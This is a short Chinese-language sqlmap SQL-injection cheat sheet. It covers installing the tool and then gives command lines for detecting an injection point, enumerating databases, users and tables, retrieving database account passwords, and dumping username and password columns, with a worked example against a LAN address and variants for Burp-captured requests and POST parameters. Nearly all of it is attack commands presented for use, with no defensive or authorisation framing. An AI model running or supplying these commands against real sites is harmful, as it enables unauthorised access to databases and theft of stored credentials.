sqlmap注入大致流程
1、安装python并环境配置,检验
2、安装sqlmap,将sqlmap文件复制到python文件中
3、在cmd中cd 到sqlmap文件路径
4、输入python sqlmap.py -u "注入点"
5、后续注入参考以下用法
语法
1、sqlmap用法(get类型sqlmap注入)
sqlmap.py -u 'url' # 检测注入点是否可用
sqlmap.py -u 'url'--dbs #可曝出该mysql中所有数据库名称
sqlmap.py -u 'url' --current-db #web当前使用的数据库
sqlmap.py -u 'url' --current-user #web数据库使用账户
sqlmap.py -u 'url' --users #列出sql所有用户
sqlmap.py -u 'url' --passwords #数据库账户与密码
sqlmap.py -u 'url' --tables #输出所有的表
sqlmap.py -u 'url' -D 【数据库名】 --tables #-D 指定数据库名
sqlmap.py -u 'url' -D 【数据库名】 -T 【表名】 --columns #-T:指定要列出字段的表
columns 列出了所有的列字段
sqlmap.py -u 'url' -D 【数据库名】 -T 【表名】 -C"username,realname,password" --dump
# -C :指定要暴的字段
扩充实例
注入点:http://192.168.117.135/xxx.php?xxx_id=1
输入“python sqlmap.py --version”检查sqlmap是否安装成功 输入“python sqlmap.py -hh”, “-hh”参数用于查看sqlmap的使用说明 输入“python sqlmap.py -u 'url',其中“-u”参数用于指定注入点的URL。 输入“python sqlmap.py –u 'url' --dbs”,其中参数“--dbs”用于列举数据库。 输入“python sqlmap.py -u 'url'-D jnng --tables”,其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。 输入“python sqlmap.py -u 'url'-D jnng -T root --columns”,其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。 输入“python sqlmap.py -u 'url' -D jnng -T root -C root_id,root_name,root_pass --dump”,其中参数“-C”用于指定字段名称,参数“—dump”用于导出数据。
2、sqlmap万能用法
burp抓包保存为1.txt
sqlmap.py -r 1.txt --dbs #可曝出该mysql中所有数据库名称
sqlmap.py -r 1.txt --current-db #web当前使用的数据库
3、post类型Sql注入
1、可以用sql万能用法
2、sqlmap.py -u "url" --data "n=值&p=值"(n、p的值指抓包的参数)